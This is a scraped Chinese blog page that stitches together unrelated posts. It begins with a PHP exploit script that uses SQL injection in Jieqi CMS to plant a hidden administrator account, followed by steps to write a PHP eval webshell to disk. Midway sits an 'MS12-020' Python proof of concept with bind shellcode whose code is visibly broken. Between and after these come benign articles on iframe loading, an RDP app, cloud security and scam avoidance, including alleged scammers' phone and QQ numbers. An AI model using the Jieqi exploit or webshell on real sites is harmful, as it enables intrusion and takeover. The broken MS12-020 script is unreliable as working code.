<?php  
error_reporting(0);  
set_time_limit(0);  
ini_set("default_socket_timeout", 5);  
  
function http_send($host, $packet, $port){  
        $sock = fsockopen($host, $port);  
        while (!$sock){  
                print "\n[-] No response from {$host}:$port Trying again...";  
                $sock = fsockopen($host, $port);  
        }  
        fputs($sock, $packet);  
        while (!feof($sock)) $resp .= fread($sock, 1024);  
        fclose($sock);  
        print $resp;  
        return $resp;  
}  
  
print_r(' 
+---------------------------------------------------------------------------+ 
|   Jieqi CMS Add Manager [version <=1.7]                                        | 
+---------------------------------------------------------------------------+ 
|   By   : 蓝孩(b1u3b0y)                                                    | 
|   Team : MyClover.Org        &amp;&amp; Insight-Labs.Org                                    | 
|   Date : 2012.3.25                                                              | 
|   Blog : hi.baidu.com/b1ueb0y                                                | 
+---------------------------------------------------------------------------+ 
');  
  
if ($argc < 4)  
{  
        print "\nUsage......: php $argv[0] host port path\n";  
        print "\nExample....: php $argv[0] localhost 80 /\n";  
        die();  
}  
  
$host = $argv[1];  
$port = $argv[2];  
$path = $argv[3];  
  
$payload  = "username=asd123s&amp;password=imnothack&amp;repassword=imnothack&amp;email=12sds2fg@QQ.COM&amp;sex=9,'asd34sadsa@QQ.COM','',0,0,'','','','','','','','',1332592733,0,0,0,1,0,0,0,0,10,10,0,0,0,0,0,0,0,0),(0, 0, 'b1u3b0y', 'b1u3b0y', '2eb429c676681a7bf5ae8702aa768363', 2, 1332592733, 'H', 9, 'hello@myclover.org', '', 0, 0, '', '', '', '', '', '', '', '', 1332592733, 0, 0, 0, 1, 0, 0, 0, 0, 10, 10, 0, 0, 0,0, 0, 0, 0, 0)#&amp;qq=&amp;url=&amp;action=newuser&amp;submit=%CC%E1+%BD%BB\r\n";  
$packet = "POST {$path}register.php?do=submit HTTP/1.1\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";  
$packet .= "Content-Length: ".strlen($payload)."\r\n";  
$packet .= "Cookie: jieqiVisitInfo=jieqiUserLogin%3D1332488363%2CjieqiUserId%3D1; PHPSESSID=ho4u03ebnlq6cl6vlg1t2kbjg2";  
$packet .= "Connection: close\r\n\r\n";  
$packet .= $payload;  
  
http_send($host, $packet, $port);  
  
print_r(' 
+---------------------------------------------------------------------------+ 
[+] Add manager successful?  Please check it yourself! 
[ ] Default URL: http://localhost/admin 
[ ] username = b1u3b0y 
[ ] password = lanhai 
+---------------------------------------------------------------------------+ 
[+] Get Webshell (mysql用户需要file_priv权限) 
[ ] [系统工具] -> [系统信息]  (Get Path) 
[ ] [数据维护] -> [数据库升级]  
[ ] 执行 [ select concat(char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)) into dumpfile \'C:\\\\wwwroot\\\\1.php\' ] 
[ ] http://localhost/1.php (password:cmd) 
+---------------------------------------------------------------------------+ 
');  
?>  

• iframe会阻塞主页面的onload事件
• 主页面和iframe共享同一个连接池

阻塞主页面的onload是这两个问题中最影响性能的方面。一般都是想让onload时间越早触发越好，一方面是用户体验过更重要的是google给网站的加载速度的打分：用户可以用IE和FF中Google工具栏来计时。

那么为了提高页面性能，怎样才能不阻塞主页面的onload事件的来加载iframe呢？

这篇讲了四种加载iframe的方法：普通iframe，onload之后加载iframe，setTimeout() iframe和异步加载iframe。每种方法的加载结果我都用IE8的时间线来展示。我建议多注意下动态异步加载这个方法，因为这是性能表现最佳的。另 外，还有一种友好iframe(friendly iframe)技术。他可能算不上是iframe加载的技术，但是必须使用iframe，他是无阻塞加载的。

普通方法加载iframe

这是一种人尽皆知的普通加载方法，它没有浏览器的兼容性问题。

<iframe src="/path/to/file" frameborder="0" width="728" height="90" scrolling="auto"> </iframe>

使用这种加载方法会在各浏览器中有如下表现：

• iframe会在主页面的onload之前加载
• iframe会在所有iframe的内容都加载完毕之后触发iframe的onload
• 主页面的onload会在iframes的onload触发之后触发，所以iframe会阻塞主页面的加载
• 当iframe在加载的过程中，浏览器的会标识正在加载东西，处于忙碌状态。

这里是一个演示页面，时间线图显示出iframe会阻塞主页面的加载。

我的建议：注意onload阻塞。如果iframe的内容只需要很短的时间来加载和执行，那么也不是个大问题，而且使用这种方法还有个好处是可以和 主页面并行加载。但是如果加载这个iframe需要很长时间，用户体验就很差了。你得自己测试一下然后在 http://www.webpagetest.org/也做些测试，根据onload的时间看看是否需要其他加载方法。

在onload之后加载iframe

如果你想在iframe中加载一些内容，但是这些内容对于页面来说不是那么的重要。或者这些内容不需要马上展现给用户的，需要点击触发之类的。那么可以考虑在主页面载入之后加载iframe。

<script>

//doesn't block the load event
function createIframe() {
    var i = document.createElement("iframe");
    i.src = "path/to/file";
    i.scrolling = "auto";
    i.frameborder = "0";
    i.width = "200px";
    i.height = "100px";
    document.getElementById("div-that-holds-the-iframe").appendChild(i);
};
// Check for browser support of event handling capability
if (window.addEventListener) window.addEventListener("load", createIframe, false);
else if (window.attachEvent) window.attachEvent("onload", createIframe);
else window.onload = createIframe;

</script>

这种加载方法也是没有浏览器的兼容性问题的：

• iframe会在主页面onload之后开始加载
• 主页面的onload事件触发与iframe无关，所以iframe不会阻塞加载
• 当iframe加载的时候，浏览器会标识正在加载

这是是一个测试页面，时间线图如下

这种方法比普通方法有什么好处呢？load事件会马上触发，有两个好处：

• 其他等待主页面onload事件的代码可以尽早执行
• Google Toolbar计算你页面加载的时间会大大减少

但是，当iframe加载的时候，还是会看到浏览器的忙碌状态，相对于普通加载方法，用户看到忙碌状态的时间更长。还有就是用户还没等到页面完全加载完的时候就已经离开了。有些情况下这是个问题，比如广告。

setTimeout()来加载iframe

这种方法的目的是不阻塞onload事件。
Steve Souders(又是他？)有一个这种方法的测试页面(http://stevesouders.com/efws/iframe-onload-nonblocking.php)。他写道：“src通过setTimeout动态的设置，这种方法可以再所有的浏览器中避免阻塞”。

<iframe id="iframe1" src="" width="200" height="100" border="2">
 </iframe>

<script>

function setIframeSrc() {
    var s = "path/to/file";
    var iframe1 = document.getElementById('iframe1');
    if ( - 1 == navigator.userAgent.indexOf("MSIE")) {
        iframe1.src = s;
    } else {
        iframe1.location = s;
    }
}
setTimeout(setIframeSrc, 5);

</script>

在除了IE8以外的所有浏览器中会有如下表现：

• iframe会在主页面onload之前开始加载
• iframe的onload事件会在iframe的内容都加载完毕之后触发
• iframe不会阻塞主页面的onload事件(IE8除外)
• 为什么不会阻塞主页面的onload呢(IE8除外)？因为setTimeout()
• 当iframe加载的时候，浏览器会显示忙碌状态

下面是时间线图

因为IE8的问题，这种技术就不适合很多网站了。如果有超过10%的用户使用IE8,十分之一的用户体验就会差。你会说那也只是比普通加载差一点 点，其实普通加载性能上也不差。onload事件对于10%的用户来说都更长。。。。额，你自己考虑吧。但是最好在看了下面这个很赞的异步加载方法之后再 决定吧。

我在参加Velocity 2010的时候，Meebo的两个工程师(@marcuswestin and Martin Hunt)做了一个关于他们的Meebo Bar的演讲。他们使用iframe来加载一些插件，并且真正做到了无阻塞加载。对于有的开发者来说，他们的做法还比较新鲜。很赞，超级赞。但是一些原因 导致这种技术没有得到相应的关注，我希望这篇blog能把它发扬光大。

<script>

(function(d) {
    var iframe = d.body.appendChild(d.createElement('iframe')),
    doc = iframe.contentWindow.document;
 
    // style the iframe with some CSS
    iframe.style.cssText = "position:absolute;width:200px;height:100px;left:0px;";
 
    doc.open().write('<body onload="' + 'var d = document;d.getElementsByTagName(\'head\')[0].' + 'appendChild(d.createElement(\'script\')).src' + '=\'\/path\/to\/file\'">');
 
    doc.close(); //iframe onload event happens
})(document);

</script>

神奇的地方就在<body onload=”">:这个iframe一开始没有内容，所以onload会立即触发。然后你创建一个script元素，用他来加载内容、广告、插 件什么的，然后再把这个script添加到HEAD中去，这样iframe内容的加载就不会阻塞主页面的onload！你应该看看他在个浏览器中的表现：

• iframe会在主页面onload之前开始加载
• iframe的onload会立即触发，因为iframe的内容一开始为空
• 主页面的onload不会被阻塞
• 为什么这个iframe不会阻塞主页面的onload？因为<body onload=”">
• 如果你不在iframe使用onload监听，那么iframe的加载就会阻塞主页面的onload
• 当iframe加载的时候，浏览器终于不显示忙碌状态了（非常好）

我的测试页给出下面的时间线：

转义字符让代码看着有些难受，这都不是问题。试试吧。

友好型iframe加载

这是用来加载广告的。虽然这不是一种iframe的加载技术，但是是用iframe来盛放广告的。他的亮点不在于iframe如何加载，而是主页面、iframe、广告如何协同工作的。如下：

• 先创建一个iframe。设置他的src为一个相同域名下的静态html文件
• 在这个iframe里面，设置js变量inDapIF=true来告诉广告它已经加载在这个iframe里面了
• 在这个iframe里面，创建一个script元素加上广告的url作为src，然后像普通广告代码一样加载
• 当广告加载完成，重置iframe大小来适应广告

这种方法也没有浏览器的兼容性问题。

Ad Ops Council在推荐过这个方法，AOL也是用这种方法。想看看源码：这里有一个。一家瑞典的出版社Aftonbladet对于这种加载有很不错的结论：在他们的主页上，加载时间减少30%，用户每周增加7%，新闻部分的点击量增加35%。我建议可以看看他们的资料：High Performance Web Sites, With Ads: Don’t let third parties make you slow

我没有创建相关的测试页，所以也没有第一首的资料。从我调研的结果来说：
如果你只想在你的网页上调用一个确定的src地址的iframe的话这个方法不是很有用。

如果你想在网页上展示多个广告，比较灵活的方法的是：加载一个广告，然后更新iframe加载另一个主页面的DOMContentLoaded时间不会被阻塞，页面渲染也不会被阻塞，当然，主页面的onload事件还是会被阻塞。

翻译原文地址：http://www.aaronpeters.nl/blog/iframe-loading-techniques-performance?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+aaronpeters+(Aaron+Peters)

Xtralogic Android的远程桌面客户端(Xtralogic Remote Desktop Client) 能够通过Internet将手机连接到Windows电脑。一旦连接上，你就可以通过鼠标和键盘来控制电脑。即使你离开电脑，你所访问的文件，应用程序和电子邮件也不会丢失。Xtralogic远程桌面客户端使用Microsoft远程桌面协议（RDP）。Windows操作系统的大多少版本都包含 Xtralogic远程桌面客户端所必需的服务器组件。
Xtralogic Android的远程桌面客户端特点：
- 支持8、16、24位
- 自定义屏幕分辨率，包括允许自动适应设备屏幕
- SSL安全性，支持网路身份验证（NLA）
- 支持微软远程桌面网关（RD网关，又名TS网关）
- 屏幕键盘，弥补设备上缺失的按键（如功能键等）
- 服务器地址簿
- 设定密码保护服务器密码储存
- 声音重定向客户端
- 在SD卡和远程电脑之间传输文件
- 在客户端和服务器之间复制/转帖文本
- 显示放大/缩小
- 缩放（适用于支持多点触控功能的设备）
- 首个也是唯一支持微软的远程协助的移动移动远程桌面客户端
- RDP数据压缩和缓存，以节省带宽
Xtralogic Android的远程桌面客户端2.9.2更新：
- 鼠标指针热点追踪（Android 3.1）
- 支持物理鼠标右键
- 支持鼠标转动（Android 3.1）
- 支持全尺寸蓝牙和USB键盘（Android 3.1）

下面是截图

下载地址：Remote Desktop远程桌面2.9.2汉化版

虽然没讲技术细节，却是我自己最满意的一场演讲，因为终于讲清楚了什么是“云计算”，什么是“云计算安全”

这是我对云计算的理解，我对云计算安全的战略判断。这回可没有藏私哦，公司内部都没讲过的，老板也不知道我来讲什么，所以是“未阉割版”。

战略很美好，但能不能做出来还得两说，继续努力吧，竞争对手们也是。　

嗓子这两年来是越来越差了，连续讲10分钟，嗓子就会哑，所以一直在咳嗽，10分钟后明显声音都不太对了。

PPT也没有太多时间准备，所以明显可以看出来，前10页的PPT质量要好很多，后面的PPT就是随便写的了。

大会介绍：http://110.taobao.com/summitmeeting/2012031617.htm

video：http://v.youku.com/v_show/id_XMzY5MTQwMzI4.html

以下是PPT，没水印，各位亲手下留情，别盗用了哦，不然下次不发了。

    MS12-020 Proof Of Concept.
     
    #!/usr/bin/env python
    #############################################################################
    #   MS12-020 Exploit
    #
    #   Uses FreeRDP
    #############################################################################
    import struct
    import sys
    from freerdp import rdpRdp
    from freerdp import crypto
    from freerdp.rdpRdp import  rdpNego
    #bind shellcode TCP port 4444
    shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
    shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
    shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
    shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
    shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
    shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
    shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
    shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
    shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
    shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
    shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
    shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
    shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
    shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
    shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
    shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
    shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
    shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
    shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
    shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
    shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
    shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
    shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'
    #Payload
    payload  = '\x41\x00\x5c\x00'
    payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
    payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
    payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
    payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
    payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
    payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
    payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
    payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
    payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
    payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
    payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
    payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
    payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
    payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
    payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
    payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
    payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
    payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
    payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
    payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
    payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
    payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
    payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
    payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
    payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
    payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
    payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
    payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
    payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
    payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
    payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
    payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
    payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
    payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
    payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
    payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
    payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
    payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
    payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
    payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
    payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
    payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
    payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
    payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';
    class SRVSVC_Exploit(Thread):
        def __init__(self, target, port=3389):
            super(SRVSVC_Exploit, self).__init__()
            self.__port   = port
            self.target   = target
        def __DCEPacket(self):
            print '[-]Connecting'
            self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
            self.__trans.connect()
            print '[-]connected' % self.target
            # Making teh packet
            self.__stub='\x01\x00\x00\x00'
            self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
            self.__stub+=shellcode
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x00\x00\x00\x00'
            self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
            self.__stub+=payload
            self.__stub+='\x00\x00\x00\x00'
            self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
            self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
            self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
            self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
            return
        def run(self):
            self.__DCEPacket()
            self.__dce.call(0x1f, self.__stub)
            print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'
    if __name__ == '__main__':
            target = sys.argv[1]
            print '\nUsage: %s <target ip> \n' % sys.argv[0]
            sys.exit(-1)
    current = SRVSVC_Exploit(target)
    current.start()

　来源：http://pastebin.com/wtPvY5Lg

披露状态：

2012-03-14： 积极联系厂商并且等待厂商认领中，细节不对外公开
2012-03-14： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

传说了N久的东西

详细说明：

as title

漏洞证明：

我也是看到的

修复方案：

版权声明：转载请注明来源 疯狂@乌云

这篇内容主要讨论站长如何防止诈骗的问题，内容并不多，希望大家有所收获。

前段时间群里有人买了个4位数字域名，其中有个数字是1，最后才发现那个数字不是1是L。因为1和L在QQ中发出来很像所以很多人都被蒙混了。

上次我看到一个域名是L0086.cn（看起来像10086.cn） 我准备抢下来，后来一想这个1可能也是假的，结果复制一下切换字体一看，果然是L0086.cn还有互联网上有很多再卖垃圾域名，而且越卖越贵，这些域名 要么是被K过的，要么就是要过期的，域名最好去国内大公司注册，这样的域名比较稳定，过户也很方便，现在小IDC公司注册的域名，一般有效使用期都在他们 公司关闭之前。

上个月我去备案随便去百度搜索下，发现最上面有个叫beian7.com的网站可以提供备案而且能三天内快速备案，然后我跟他们联系后把钱给他们，结果到 现在已经30多天了还没有备案，每次问他们什么时候好，总是不理人，电话也关机。每次说他们是骗子时，他们才回话然后找个理由出来叫我继续等一个星期。一 直到现在也不退款也不给我备案。他们的qq702119455　 qq785112711 qq100191883 这个手机：15221706272 永远关机。

提醒大家不要相信他们，备案一点要找熟人介绍的比较好，或者去淘宝自己慢慢挑，如果像beian7.com这样的网站可能会拿了你的资料不给你备案，就是 给你备案了，可能资料也不是你的，撤销很麻烦的。等哪天你再自己备案时发现你的资料身份证号码被重复使用，也就是你再也不能用自己身份证备案了。

现在生活中办点事使用身份证复印件不是什么新鲜事，用的多了难免会由于保存单位的管理不善导致外泄，然后被不法人员冒名利用，为防范于未然，在使用的身份证复印件上做标明，不失为一个好习惯。那么如何标注才能既不影响使用，又能保证安全呢？

 这事我想您也知道，但怎么标明最合适最安全您清楚么，原来我也认为很简单，但真需要时却有点不知道该怎么标，担心自己标的没什么作用或怕影响复印件使用，通过对网上和电视上的介绍学习总结了一下，种在这里给更多人做个参考。 

　　　 1、标注越细越好，最好用蓝色圆珠笔，但不要遮住身份证号和姓名；
　　　 2、部分笔画与身份证上的字要有交叉或接触
　　　 3、通常写三行，每一行后面一定要画上横线，以免被偷加其他文字；
　　　 4、在身份证范围内签名。
　　　 提示：无论是信用卡，基金，手机等申请书，只要须附身分证复印件的，一律照办，政府的表格也一样。
　　　 您知道吗？律师认为，一般来说，仅凭身份证复印件是无法起到证明作用的。但鉴于我国目前审核制度不完善的实际，不排除某些人员违规操作，仅凭复印件就能办理某些手续。

我的网站是： http://www.bxs.cc/ 文章页有评论区，如果大家有什么关于类似方面的问题可以来找我参考一下。
这个真的是很重要…如果你有修过相关法律课程或票据课程你就知道，所以…大家小心点，身分证复印件记得要签名呦！